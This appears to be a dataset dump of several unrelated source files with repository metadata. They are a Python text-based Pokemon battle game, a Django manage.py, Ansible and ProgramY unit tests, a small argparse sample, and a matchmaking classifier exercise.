['None'] * 2 # Initial Second Pokemon Type player_type2 = ['None'] * 2 # Initial First Attack Table based on Pokemon Type player_attack1 = ['None'] * 4 # Initial Second Attack Table based on Pokemon Type player_attack2 = ['None'] * 4 # Default location - New Bark Town (Line Number only) player_location_index = 0 # Player's money (Integer Value only) player_money = 0 # Player's potion (Default to 3 when game starts) player_potion = 3 # Enemy Pokemon Level enemy_level = 1 # Enemy Pokemon identified enemy_pokemon = ['None'] * 10 # Enemy HP enemy_hp = 1 # Enemy's Pokemon Type enemy_type1 = ['None'] * 2 # Enemy's second Pokemon Type enemy_type2 = ['None'] * 2 # Initial table for the name of Pokemon (Line Number only) enemy_pokemon_index = 0 # 0: Enemy Attack / 1: Player Attack; Options ;FUNCTION def attack(type, player_hp, enemy_hp, option): # Player Attacks Enemy;CONDITIONAL STATEMENT if type == 1: if player_hp > enemy_hp: damage = random.randint(1, int(enemy_hp * 0.5)) enemy_hp -= damage else: damage = random.randint(int(enemy_hp * 0.5), enemy_hp) enemy_hp -= damage # BUG FIX - if Enemy HP is too low, you can't complete the battle;CONDITIONAL STATEMENT if enemy_hp < 5: damage += enemy_hp enemy_hp = 0 print(f'Enemy HP has decreased by: {damage}') return enemy_hp # Enemy Attacks Player;CONDITIONAL STATEMENT else: if player_hp > enemy_hp: damage = random.randint(1, int(enemy_hp * 0.2)) else: damage = random.randint(int(player_hp * 0.1), enemy_hp) # BUG FIX: negative HP damage;CONDITIONAL STATEMENT if player_hp < damage: # Make sure player_hp reaches zero damage = player_hp player_hp -= damage print(f'Your HP has decreased by: {damage}') return player_hp def escape(): chance = random.randint(0, 10) # 50% chance for the player to escape the battle;CONDITIONAL STATEMENT if chance < 5: print("Escape Unsuccessful") return 0 else: print("Escape Successful!") return 1 # Main Menu for the players to explore the game;FUNCTION def attack_menu(): print("Your options are:") if player_level[player_pokemon_selected] < 5: print(f'1: {player_attack1[1]}') player_p1_attack_options = 1 if player_type2[0] != '0': print(f'2: {player_attack2[1]}') player_p1_attack_options = 2 elif player_level[player_pokemon_selected] < 10: print(f'1: {player_attack1[1]}') print(f'2: {player_attack1[2]}') player_p1_attack_options = 2 if player_type2[0] != '0': print(f'3: {player_attack2[1]}') print(f'4: {player_attack2[2]}') player_p1_attack_options = 4 # Determining Enemy's health;CONDITIONAL STATEMENT else: print(f'1: {player_attack1[1]}') print(f'2: {player_attack1[2]}') print(f'3: {player_attack1[3]}') player_p1_attack_options = 3 if player_type2[0] != '0': print(f'4: {player_attack2[1]}') print(f'5: {player_attack2[2]}') print(f'6: {player_attack2[2]}') player_p1_attack_options = 6 # Option to capture the Pokemon will appear once the Enemy's HP is <10;CONDITIONAL STATEMENT if enemy_hp < 10: print("CAP: Capture this Pokemon") print("ESC: Escape the battle") return input("What's your move?").upper().strip() # Declare a function def typing_effect(text, mode, newline, clear_screen, speed): # Sound will adapt to speed;CONDITIONAL STATEMENT if speed < 0.02: pygame.mixer.music.load('gamedata/typing_fast.wav') else: pygame.mixer.music.load('gamedata/typing_slow.mp3') pygame.mixer.music.play(-1) if clear_screen == True: print("\n" * 80) text_array = list(text) text_count = len(text) for probe in range(text_count): print(text_array[probe], end='') # The smaller the time the quicker time.sleep(speed) if newline == True: print("") pygame.mixer.music.stop() # Initialisation of the PyGame Library;FUNCTION def game_intro(): pygame.init() # Window popped up will be 1x1 pixels in size pygame.display.set_mode((1, 1)) # Open Pokemon Game Introduction text file;FUNCTION lines = open('gamedata/intro.txt').read().splitlines() if game_debug != 'YES': # Print the file, line by line;FUNCTION for probe in range(len(lines)): typing_effect(lines[probe], 0, True, False, 0.1) pygame.mixer.music.load('gamedata/morning_in_forest.mp3') pygame.mixer.music.set_volume(1) pygame.mixer.music.play(-1) def game_first_run(): global player_max_pokemon user_input = 'N' while not user_input == 'Y': # Randomly Select a line number from the Pokemon Library random_line = random.choice(range(len(list_pokemon))) # Store the random line into the Array player_pokemon_index[0] = random_line load_pokemon(random_line, 0, 1) player_max_pokemon = 1 user_input = input("Would you like to commit to this Pokemon? Y/N ").upper() def load_pokemon(line, reference, force_load): global player_type1 global player_type2 global player_attack1 global player_attack2 # Clear existing values from Array player_type1.clear() player_type2.clear() player_attack1.clear() player_attack2.clear() # Temporary Variable to load the Pokemon's details player_pokemon_current = list_pokemon[int(line)].split(',') # This is to ensure we are not resetting the HP if we load the Pokemon;CONDITIONAL STATEMENT if force_load == 1: # Error Correction - Integer ;FUNCTION player_hp[reference] = int(player_pokemon_current[4] * player_level[int(reference)]) player_type1 = list_type[int(player_pokemon_current[1])].split(',') player_type2 = list_type[int(player_pokemon_current[2])].split(',') player_attack1 = list_attack[int(player_pokemon_current[1])].split(',') player_attack2 = list_attack[int(player_pokemon_current[2])].split(',') print(f'The Pokemon selected is:') print(f'Name: {player_pokemon_current[0]}; Pokemon Type: {player_type1[1]}, {player_type2[1]}') print(f'Pokemon HP: {player_hp[reference]}') print(f'Attack Moves: {player_attack1[1]}, {player_attack1[2]}, {player_attack1[3]}') # Avoid printing empty list;CONDITIONAL STATEMENT if not player_type2[1] == 'NONE': print(f'{player_attack2[1]}, {player_attack2[2]}, {player_attack2[3]}, ') def main_menu(): global player_location_index # Declare a temporary User Input Variable menu_input = 0 while menu_input < 1: print("=====MAIN MENU=====") print("===What would you like to do?===") print("1. Travel to another location") print("2. Go Shopping!") print("3. Show my Pokemon") print("4. Select owned Pokemon") print("5. Return Home") print("6. Drink Medicinal Healing Potion") # Random tips for Player's ease of gameplay print(f'Player Tip of the Day: {random.choice(list_tips)}') menu_input = input("Please select from options 1~6. ") try: menu_input = int(menu_input) except ValueError: print("Invalid User Input!") menu_input = 0 if menu_input == 1: travel_return = int(travel_menu()) travel(travel_return) elif menu_input == 2: shop_menu() elif menu_input == 3: show_pokemon() elif menu_input == 4: select_pokemon() elif menu_input == 5: return_home() elif menu_input == 6: drink_potion() else: print("Invalid User Input!") def shop_menu(): global player_money global player_potion shop_decision = 'NONE' print("Purchasing 1x Medicinal Healing Potion will cost you $50!") while not (shop_decision == 'N' or shop_decision == 'Y'): shop_decision = input("Are you sure about your purchase? Y/N? ").upper().strip() if shop_decision == 'N': print("TRANSACTION CANCELLED!") # Player goes forward with the purchase and has enough money;CONDITIONAL STATEMENT elif shop_decision == 'Y' and player_money > 49: player_money -= 50 player_potion += 1 # Player goes forward with the purchase but does not have enough money;CONDITIONAL STATEMENT elif shop_decision == 'Y': print("You do not have enough money to go forward with this purchase!") print(f'Now, you have {player_potion}x potions!') time.sleep(3) def drink_potion(): global player_potion global player_hp global player_pokemon_selected global player_pokemon_index # Player has potions;CONDITIONAL STATEMENT if player_potion > 0: # Deduct the number of potions by one. player_potion -= 1 # One potion will increase 30% of health, output as integer to avoid decimal HP;FUNCTION player_hp[player_pokemon_selected] += int(player_hp[player_pokemon_selected] * 0.30) # Temporary Variable to load the Pokemon details;FUNCTION player_pokemon_current = list_pokemon[player_pokemon_index[player_pokemon_selected]].split(',') # Determine the max HP for the given Pokemon as an integer;FUNCTION player_hp_max = int(player_pokemon_current[4] * player_level[int(player_pokemon_selected)]) if player_hp[player_pokemon_selected] > player_hp_max: print("You have reached the maximum HP for your Pokemon!") player_hp[player_pokemon_selected] = player_hp_max else: print("You do not have enough potions!") print(f'The current number of potions left is: {player_potion}') print(f'Your new accelerated HP is: {player_hp[player_pokemon_selected]}') time.sleep(3) def show_pokemon(): current_reference = player_pokemon_selected # Player owns more than one Pokemon;CONDITIONAL STATEMENT if player_max_pokemon > 1: print(f'You currently have {player_max_pokemon} Pokemons!') else: print(f'You currently have {player_max_pokemon} Pokemon!') # List all the Pokemon here for probe in range(player_max_pokemon): print(f'**Reference: {probe + 1}**') load_pokemon(player_pokemon_index[probe], 0, 0) time.sleep(3) print(f'Currently selected Pokemon: {current_reference + 1}') # Load back to current Pokemon;FUNCTION load_pokemon(player_pokemon_index[current_reference], 0, 0) input("Press Enter to continue...") def select_pokemon(): select_input = 0 while select_input < 1: select_input = input("Please type in your Pokemon reference number: ") try: select_input = int(select_input) except ValueError: print("Invalid User Input!") select_input = 0 # Invalid reference number;CONDITIONAL STATEMENT if select_input > player_max_pokemon: print("Invalid User Input!") select_input = 0 print(f'**Your current selected Pokemon reference: {select_input}**') load_pokemon(player_pokemon_index[int(select_input) - 1], 0, 0) time.sleep(3) def return_home(): global player_location_index # Make sure player is not at hometown;CONDITIONAL STATEMENT if player_location_index > 0: current_location = list_location[player_location_index].split(',') print(f'Travelling back home will cost you: {current_location[3]} Pokemon meters.') return_decision = 'NONE' while not (return_decision == 'N' or return_decision == 'Y'): return_decision = input("Are you sure? Y/N? ").upper().strip() # Player insists to capture and own the Pokemon;CONDITIONAL STATEMENT if return_decision == 'N': print("TRAVEL CANCELLED!") elif return_decision == 'Y': travel(0) else: # BUG FIX print("You are already at your hometown!") time.sleep(3) def travel_menu(): global player_location_index # TESTING ONLY # player_location_index = 6 current_location = list_location[player_location_index].split(',') # Declare a temporary User Input Variable;FUNCTION travel_input = 0 # Declare first possible location;FUNCTION probe_list_1 = 0 # Declare second possible location;FUNCTION probe_list_2 = 0 # Declare a temporary menu item count;FUNCTION menu_upper_limit = 2 print(f'You are currently in: {current_location[0]}') print("***Please indicate which location you would like to travel to?***") while travel_input > menu_upper_limit or travel_input < 1: # Player is not at hometown;CONDITIONAL STATEMENT if player_location_index > 0: probe_list_1 = player_location_index - 1 new_location = list_location[probe_list_1].split(',') print(f'1: Return to {new_location[0]} - distance of travel is {new_location[1]} Pokemon meters.') probe_list_2 = player_location_index + 1 new_location = list_location[probe_list_2].split(',') print(f'2: {new_location[0]} - distance of travel is {new_location[1]} Pokemon meters.') print("3: Exit Travel Menu") menu_upper_limit = 3 # Player is at hometown (player_location_index=0);CONDITIONAL STATEMENT else: probe_list_1 = player_location_index + 1 new_location = list_location[probe_list_1].split(',') print(f'1: Travel to {new_location[0]} - distance of travel is {new_location[1]} Pokemon meters.') print("2: Exit Travel Menu") menu_upper_limit = 2 travel_input = input("Please select from the options listed above! ").strip() try: travel_input = int(travel_input) except ValueError: print("Invalid User Input!") travel_input = 0 # Exit Menu command gets treated first;CONDITIONAL STATEMENT if travel_input == menu_upper_limit: return player_location_index # First option is selected;CONDITIONAL STATEMENT elif travel_input == 2: return probe_list_2 else: return probe_list_1 def travel(reference): global player_location_index # Update the existing location;FUNCTION current_location = list_location[player_location_index].split(',') if reference != player_location_index: # Current location will become the new index after travelling player_location_index = reference # Update the existing location again;FUNCTION current_location = list_location[player_location_index].split(',') print("Now travelling...") # Similar code used in typing_effect function for probe in range(50): print(">", end='') if travel_check(5): random_enemy() battle() # The smaller the time the quicker time.sleep(0.1) print("") print(f'Travel journey complete! Now in: {current_location[0]}') else: print(f'Your current location: {current_location[0]}') time.sleep(3) # Random Enemy Generator;FUNCTION def travel_check(percentage): chance = random.randint(1, 100) if chance < percentage: return 1 else: return 0 # Declare Global Variables below def random_enemy(): global enemy_level global enemy_pokemon global enemy_hp global enemy_type1 global enemy_type2 global enemy_pokemon_index enemy_level = int(player_level[player_pokemon_selected]) # Randomly Select a line number from the Pokemon Library;FUNCTION enemy_pokemon_index = random.choice(range(len(list_pokemon))) # Split Enemy Pokemon (Random) into Strings;FUNCTION enemy_pokemon = list_pokemon[enemy_pokemon_index].split(',') # Error Correction - Integer ;FUNCTION enemy_hp = int(enemy_pokemon[4]) * int(player_level[player_pokemon_selected]) enemy_type1 = list_type[int(enemy_pokemon[1])].split(',') enemy_type2 = list_type[int(enemy_pokemon[2])].split(',') # Open text file;FUNCTION battle_word_list = open('gamedata/battle.txt').read().splitlines() # Adjectives are spilt using commas;FUNCTION battle_word = random.choice(battle_word_list).split(',') # Generate random Enemy;FUNCTION print(f'You encountered {enemy_pokemon[0]}!') # Description for encountered Pokemon;FUNCTION print(f'This Pokemon is {random.choice(battle_word)}.') def battle(): global enemy_hp global player_hp global player_exp global player_money pygame.mixer.music.load('gamedata/battle.mp3') # BUG FIX: Volume is too load pygame.mixer.music.set_volume(0.1) pygame.mixer.music.play(-1) while (enemy_hp > 0) and (player_hp[player_pokemon_selected] > 0): # If Not pygame.mixer.music.get_busy(): # No Music playing at this stage, load the music # Inverse Boolean value, ensures continuous music play print(f'Player HP: {player_hp[player_pokemon_selected]}') print(f'Enemy HP: {enemy_hp}') # BUG FIX, unless stated by Player, the decision will be defaulted to the first available attack decision = 1 decision = attack_menu() # Determine if 'ESC' is pressed first;CONDITIONAL STATEMENT if decision == 'ESC': escape_result = escape() if escape_result == 1: enemy_hp = 0 print("You escaped from the battle.") elif (decision == 'CAP') and ( # To ensure Player's are not taking advantage of hidden menus and that the requirements must be met enemy_hp < 10): capture(decision) else: enemy_hp = attack(1, player_hp[player_pokemon_selected], enemy_hp, decision) if enemy_hp != 0: player_hp[player_pokemon_selected] = attack(0, player_hp[player_pokemon_selected], enemy_hp, decision) else: # Battle is over, music stops, while loop ends here pygame.mixer.music.stop() # No Music playing at this stage, load the music if not pygame.mixer.music.get_busy(): pygame.mixer.music.load('gamedata/morning_in_forest.mp3') # BUG FIX: Reset to default Volume pygame.mixer.music.set_volume(1) pygame.mixer.music.play(-1) if enemy_hp == 0: if decision != 'ESC': print("You won the battle!") player_exp[player_pokemon_selected] += int(enemy_pokemon[4]) # Choose a random number;FUNCTION earn_money = random.randint(0, 100) player_money += earn_money print( f'You earned {int(enemy_pokemon[4])} experience from this battle, now you have {player_exp[player_pokemon_selected]} points!') print(f'You earned ${earn_money}, now you have ${player_money}!') if player_exp[player_pokemon_selected] > 50: player_level[player_pokemon_selected] += int(player_exp[player_pokemon_selected] / 50) player_hp[player_pokemon_selected] += 30 * int(player_exp[player_pokemon_selected] / 50) # Determine the max Level increase;FUNCTION player_exp[player_pokemon_selected] -= int(player_exp[player_pokemon_selected]/50) print(f'You leveled up! Now, you are at level: {player_level[int(player_pokemon_selected)]}') else: game_over() def game_over(): pygame.mixer.music.load('gamedata/game_over_01.wav') # BUG FIX: Reset to default Volume pygame.mixer.music.set_volume(1) pygame.mixer.music.play(2) print("Game Over!") # Wait until music play finishes time.sleep(10) # Terminate the Program sys.exit() def capture(decision): global enemy_hp global player_hp global player_max_pokemon global enemy_pokemon_index # Initialise the capture decision capture_decision = 'NONE' chance = random.randint(0, 10) capture_status = 0 # Bad Luck - Player's capture attempt is Pokemon unsuccessful;CONDITIONAL STATEMENT if chance < 3: print("Capture Unsuccessful") capture_status = 0 else: while not (capture_decision == 'N' or capture_decision == 'Y'): print("Congratulations! You have successfully captured this Pokemon!") print("Do you want to release this Pokemon into the wild?") capture_decision = input("Y/N?").upper().strip() # Player insists to capture and own the Pokemon;CONDITIONAL STATEMENT if capture_decision == 'N': capture_status = 1 # Player Releases the Pokemon;CONDITIONAL STATEMENT elif capture_decision == 'Y': print("You released the Pokemon!") capture_status = 2 # Player insists to capture and own the Pokemon;CONDITIONAL STATEMENT if capture_status == 1: # Play has reached the maximum number of Pokemon;CONDITIONAL STATEMENT if player_max_pokemon > 4: print("You cannot catch this Pokemon - You can only have a maximum of 5 Pokemon!") elif player_max_pokemon > 3 and player_level[player_pokemon_selected] < 30: print("You cannot catch this Pokemon - You can only have a maximum of 4 Pokemon!") elif player_max_pokemon > 2 and player_level[player_pokemon_selected] < 15: print("You cannot catch this Pokemon - You can only have a maximum of 3 Pokemon!") elif player_max_pokemon > 1 and player_level[player_pokemon_selected] < 5: print("You cannot catch this Pokemon - You can only have a maximum of 2 Pokemon!") # Save Data else: print("Congratulations! You are now the owner of this Pokemon!") # Save the Pokemon index into the Array player_pokemon_index[int(player_max_pokemon)] = enemy_pokemon_index # Save the default HP to Array player_hp[player_max_pokemon] = int(enemy_pokemon[4]) # One new Pokemon added player_max_pokemon += 1 print(f'Number of currently owned Pokemon: {player_max_pokemon}') # BUG FIX, reference number starts with 0 print(f'Reference Number for this Pokemon {player_hp[player_max_pokemon - 1]}') print(player_pokemon_index) print(player_hp) # If Player's escape attempt is successful Enemy's HP is set to 0;FUNCTION enemy_hp = 0 # Player releases the Pokemon, battle complete;CONDITIONAL STATEMENT elif capture_status == 2: enemy_hp = 0 # Player fails to capture the Pokemon, now Enemy attacks else: player_hp[player_pokemon_selected] = attack(0, player_hp[player_pokemon_selected], enemy_hp, decision) # Program officially starts game_intro() game_first_run() # Main loop here;ITERATIVE LOOP while True: main_menu()
[ "72066423+MrCuffe@users.noreply.github.com" ]
72066423+MrCuffe@users.noreply.github.com
374c960f285d4baaf8c9ce3b8205ea9135cd46b5
d571d407cfda435fcab8b7ccadb1be812c7047c7
/guild/tests/samples/projects/flags-dest/submod.py
6416966dcb06abb15601a3c47796545306d1ac5c
[ "Apache-2.0", "LicenseRef-scancode-free-unknown" ]
permissive
guildai/guildai
2d8661a2a6bf0d1ced6334095c8bf5a8e391d8af
149055da49f57eaf4aec418f2e339c8905c1f02f
refs/heads/main
2023-08-25T10:09:58.560059
2023-08-12T20:19:05
2023-08-12T20:19:05
105,057,392
833
86
Apache-2.0
2023-08-07T19:34:27
2017-09-27T18:57:50
Python
UTF-8
Python
false
false
169
py
import argparse p = argparse.ArgumentParser() p.add_argument("--bar", default=456) if __name__ == "__main__": args = p.parse_args() print("bar: %s", args.bar)
[ "g@rre.tt" ]
g@rre.tt
60a2c3b6500f994d9254381f0d45ff8fc5063280
8400e9327064dbbee0c4c51c7c0cbc5b330d699e
/manage.py
07608b8519fb9a797e0de7559dc2d272eaca3985
[]
no_license
zerobits01/Tourino
7c17a547f8f388d4cd2581ab0df1621beff89453
a3500acd8efb41aeefbadbff966f956a9f1e7766
refs/heads/master
2020-09-20T21:21:09.765230
2019-12-23T07:13:37
2019-12-23T07:13:37
224,592,429
0
0
null
null
null
null
UTF-8
Python
false
false
627
py
#!/usr/bin/env python """Django's command-line utility for administrative tasks.""" import os import sys def main(): os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'Tourino.settings') try: from django.core.management import execute_from_command_line except ImportError as exc: raise ImportError( "Couldn't import Django. Are you sure it's installed and " "available on your PYTHONPATH environment variable? Did you " "forget to activate a virtual environment?" ) from exc execute_from_command_line(sys.argv) if __name__ == '__main__': main()
[ "zerobits01@yahoo.com" ]
zerobits01@yahoo.com
4be16408f688e6b5cb887f4a18ae62b9a56fd20a
af3ec207381de315f4cb6dddba727d16d42d6c57
/dialogue-engine/test/programytest/parser/template/node_tests/richmedia_tests/test_carousel.py
00edd17c4ac2091155b647b8e43f064c5c9e3f10
[ "MIT", "LicenseRef-scancode-unknown-license-reference" ]
permissive
mcf-yuichi/cotoba-agent-oss
02a5554fe81ce21517f33229101013b6487f5404
ce60833915f484c4cbdc54b4b8222d64be4b6c0d
refs/heads/master
2023-01-12T20:07:34.364188
2020-11-11T00:55:16
2020-11-11T00:55:16
null
0
0
null
null
null
null
UTF-8
Python
false
false
2,968
py
""" Copyright (c) 2020 COTOBA DESIGN, Inc. Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ from programy.parser.template.nodes.base import TemplateNode from programy.parser.template.nodes.richmedia.carousel import TemplateCarouselNode from programy.parser.template.nodes.richmedia.card import TemplateCardNode from programy.parser.template.nodes.richmedia.button import TemplateButtonNode from programy.parser.template.nodes.word import TemplateWordNode from programytest.parser.base import ParserTestsBaseClass class TemplateCarouselNodeTests(ParserTestsBaseClass): def test_carousel_node(self): root = TemplateNode() self.assertIsNotNone(root) self.assertIsNotNone(root.children) self.assertEqual(len(root.children), 0) carousel = TemplateCarouselNode() card = TemplateCardNode() card._image = TemplateWordNode("http://Servusai.com") card._title = TemplateWordNode("Servusai.com") card._subtitle = TemplateWordNode("The home of ProgramY") button = TemplateButtonNode() button._text = TemplateWordNode("More...") button._url = TemplateWordNode("http://Servusai.com/aiml") card._buttons.append(button) carousel._cards.append(card) root.append(carousel) resolved = root.resolve(self._client_context) self.assertIsNotNone(resolved) texts1 = "<carousel><card><image>http://Servusai.com</image><title>Servusai.com</title><subtitle>The home of ProgramY</subtitle>" + \ "<button><text>More...</text><url>http://Servusai.com/aiml</url></button></card></carousel>" self.assertEqual(texts1, resolved) texts2 = "<carousel><card><image>http://Servusai.com</image><title>Servusai.com</title><subtitle>The home of ProgramY</subtitle>" + \ "<button><text>More...</text><url>http://Servusai.com/aiml</url></button></card></carousel>" self.assertEqual(texts2, root.to_xml(self._client_context))
[ "cliff@cotobadesign.com" ]
cliff@cotobadesign.com
d86e8a56715d2861eb6f379c89f452d56bee2111
3de345b744400b26c8df1522bfe395cadbd8a6b3
/molecule/default/tests/test_default.py
b14ed8ceebd088f7b48f1e625f84f696acd1d0ce
[ "MIT" ]
permissive
nbjwl/ansible-role-docker
2f2bcd79b6f903d6664d0c94b0baa2c40c265f44
dbd5a43968ffa1e9f27924a81bebc8ec9d0abcec
refs/heads/master
2021-01-09T16:58:39.065555
2020-02-23T07:23:42
2020-02-23T07:23:42
242,381,541
0
0
null
null
null
null
UTF-8
Python
false
false
518
py
import os import pytest import testinfra.utils.ansible_runner testinfra_hosts = testinfra.utils.ansible_runner.AnsibleRunner( os.environ['MOLECULE_INVENTORY_FILE']).get_hosts('all') def test_hosts_file(host): f = host.file('/etc/hosts') assert f.exists assert f.user == 'root' assert f.group == 'root' @pytest.mark.parametrize("service", [ "docker" ]) def test_service_config(host, service): service = host.service(service) assert service.is_running assert service.is_enabled
[ "nbjwl@live.com" ]
nbjwl@live.com
6dcc3179577ce0122669aa7bf91612de6f07389b
5907240a1c23082e614a78dbf085cf21e7ea0e97
/ProgrammingCollectiveIntellegence/Chapter9/advancedClassify.py
5d4d3bb23c1ad5a7ae915148c3b23c12d047485c
[]
no_license
sadaharu-gintama/SomeCode
b742ec44efded16cad32e872a5c3865da1892de4
fa5361cd0302343208f1ef73acd31947d84a4fb9
refs/heads/master
2021-06-16T18:42:56.617939
2017-06-05T04:56:08
2017-06-05T04:56:08
null
0
0
null
null
null
null
UTF-8
Python
false
false
4,472
py
import matplotlib.pylab as plt class matchRow: def __init__(self, row, allNum = False): if allNum: self.data = [float(row[i]) for i in range(len(row) - 1)] else: self.data = row[0 : len(row) - 1] self.match = int(row[len(row) - 1]) def loadMatch(f, allNum = False): rows = list() for line in file(f): rows.append(matchRow(line.split(','), allNum)) return rows def plotAgeMatches(rows): xdm, ydm = [r.data[0] for r in rows if r.match == 1],\ [r.data[1] for r in rows if r.match == 1] xdn, ydn = [r.data[0] for r in rows if r.match == 0],\ [r.data[1] for r in rows if r.match == 0] plt.plot(xdm, ydm, 'go') plt.plot(xdn, ydn, 'ro') plt.show() def linearTrain(rows): averages = dict() counts = dict() for row in rows: cl = row.match averages.setdefault(cl, [0.0] * (len(row.data))) counts.setdefault(cl, 0) for i in range(len(row.data)): averages[cl][i] += float(row.data[i]) counts[cl] += 1 for cl, avg in averages.items(): for i in range(len(avg)): avg[i] /= counts[cl] return averages def dotProduct(v1, v2): return sum([v1[i] * v2[i] for i in range(len(v1))]) def dpClassify(point, avgs): b = (dotProduct(avgs[1], avgs[1]) - dotProduct(avgs[0], avgs[0])) / 2 y = dotProduct(point, avgs[0]) - dotProduct(point, avgs[1]) + b if y > 0: return 0 else: return 1 def yesNo(v): if v == 'yes': return 1 elif v == 'no': return -1 else: return 0 def matchCount(interest1, interest2): l1 = interest1.split(':') l2 = interest2.split(':') x = 0 for v in l1: if v in l2: x += 1 return x yahookey="YOUR API KEY" from xml.dom.minidom import parseString from urllib import urlopen,quote_plus loc_cache={} def getLocation(address): if address in loc_cache: return loc_cache[address] data = urlopen('http://api.local.yahoo.com/MapsService/V1/'+\ 'geocode?appid=%s&location=%s' % (yahookey,quote_plus(address))).read() doc = parseString(data) lat = doc.getElementsByTagName('Latitude')[0].firstChild.nodeValue long = doc.getElementsByTagName('Longitude')[0].firstChild.nodeValue loc_cache[address] = (float(lat), float(long)) return loc_cache[address] def milesDistance(a1,a2): lat1,long1 = getLocation(a1) lat2,long2 = getLocation(a2) latdif = 69.1 * (lat2 - lat1) longdif = 53.0 * (long2 - long1) return (latdif ** 2 + longdif ** 2) ** .5 def loadNumerical(): oldRows = loadMatch('matchmaker.csv') newRows = [] for row in oldRows: d = row.data data = [float(d[0]), yesNo(d[1]), yesNo(d[2]), float(d[5]), yesNo(d[6]), yesNo(d[7]), matchCount(d[3],d[8]), milesDistance(d[4],d[9]), row.match] newRows.append(matchRow(data)) return newRows def scaleData(rows): low = [99999999999999999999.9] * len(rows[0].data) high = [-99999999999999999999.9] * len(rows[1].data) for row in rows: d = row.data for i in range(len(d)): if d[i] < low[i]: low[i] = d[i] if d[i] > high[i]: high[i] = d[i] def scaleInput(d): return [(d.data[i] - low[i]) / (high[i] - low[i]) for i in range(len(row))] newRows = [matchRow(scaleInput(row.data) + [row.match]) for row in rows] return newRows, scaleInput def vecLength(v): return sum([p**2 for p in v]) def rbf(v1, v2, gamma = 20): dv = [v1[i] - v2[i] for i in range(len(v1))] l = vecLength(dv) return math.e ** (-gamma * l) def nlClassify(point, rows, offset, gamma = 10): sum0 = 0.0 sum1 = 0.0 count0 = 0 count1 = 0 for row in rows: if row.match == 0: sum0 += rbf(point, row.data, gamma) count0 += 1 else: sum1 += rbf(point, row.data, gamma) count1 += 1 y = (1.0 / count0) * sum0 - (1.0 / count1) * sum1 + offset if y < 0: return 0 else: return 1 def getOffset(rows, gamma = 10): l0 = list() l1 = list() for row in rows: if row.match == 0: l0.append(row.data) else: l1.append(row.data) sum0 = sum([sum([rbf(v1, v2, gamma) for v1 in l0]) for v2 in l0]) sum1 = sum([sum([rbf(v1, v2, gamma) for v1 in l1]) for v2 in l1]) return (1.0 / (len(l1) ** 2)) * sum1 - (1.0 / (len(l0) ** 2)) * sum0
[ "yi.liu.197@gmail.com" ]
yi.liu.197@gmail.com
ad07d455b953cbe243b84fdd40d6f1f6a9c3f4a2
0119a00c981009a82e30554036062327ed9aef32
/updateSymbols_sql.py
d9c59d9127e04b6d7bb33062f7d1f2d8cc1d1c6a
[]
no_license
tnszabo/thirteenf
25431b69c90670ac55a580726381aa5cf1cc4482
bb24ea69ba61a1d805c0ac599f5d3c23edea1e17
refs/heads/master
2021-01-19T04:28:52.118845
2016-08-16T19:22:12
2016-08-16T19:22:12
65,668,134
0
0
null
null
null
null
UTF-8
Python
false
false
641
py
import thirteenf_sql as db import fidelity_v2 as fidelity import datetime import pandas as pd c = db.getNewCusips() print "New cusips:", len(c) start = datetime.datetime.now() # get names and symbols names = fidelity.getSymbols(c) print "Run time:", datetime.datetime.now() - start print "New symbols:", len(names.index) if len(names.index)>0: try: print names db.appendNames(names) except Exception, e: print "appendNames:", e pass tFinish = datetime.datetime.now() - start print "Batch:", start, "Run time:", tFinish, "Names:", len(c), "Rate:", len(c)/tFinish.total_seconds()
[ "tom@tszabo.com" ]
tom@tszabo.com
21c0443c59c65a77addd1fcc15d3b94c4b037acc
7884d75d9835493ff627d0468e94fe7a838a6aa1
/ocr_server/restapi/recognize.py
ff03aad6edbfd4381bcff7e6a1e274ae8b269893
[]
no_license
fjibj/OCRServer
d2c7c5217046ffbec6f2affdd1c77379f9453d67
e23c23198fc89feb2f714faf2d022b1e21ac2151
refs/heads/master
2020-03-18T18:50:51.501629
2017-01-18T08:35:40
2017-01-18T08:35:40
null
0
0
null
null
null
null
UTF-8
Python
false
false
817
py
#!/usr/bin/env python # -*- coding: utf-8 -*- import yaml CONFIG_PATH = './recognize/config.yaml' CONFIG_DATA = {} def loadConfig(): global CONFIG_DATA f = open(CONFIG_PATH, encoding='utf-8') CONFIG_DATA = yaml.safe_load(f) f.close() for name in CONFIG_DATA: config = CONFIG_DATA[name] if 'option' not in config['feature']: config['feature']['option'] = {} if 'rotate' not in config: config['rotate'] = 'perspective' if 'validate' not in config: config['validate'] = { 'roi': None } if 'roi' not in config['validate']: config['validate']['roi'] = None if 'roi' not in config: config['roi'] = {} return def getConfig(): return CONFIG_DATA
[ "=" ]
=
62fd7f83ae140306bbea3251e99b3e08f097a951
61dfa0ac80a6979d135e969b5b7b78a370c16904
/analysis/projections/get_projection_alpha_dm.py
7abcc8371fcb01ab5adfeceb45330d9e01e88595
[]
no_license
bvillasen/cosmo_tools
574d84f9c18d92d2a9610d1d156113730d80f5a4
6bb54534f2242a15a6edcf696f29a3cf22edd342
refs/heads/master
2021-07-13T06:43:32.902153
2020-10-05T21:17:30
2020-10-05T21:17:30
207,036,538
0
0
null
null
null
null
UTF-8
Python
false
false
6,967
py
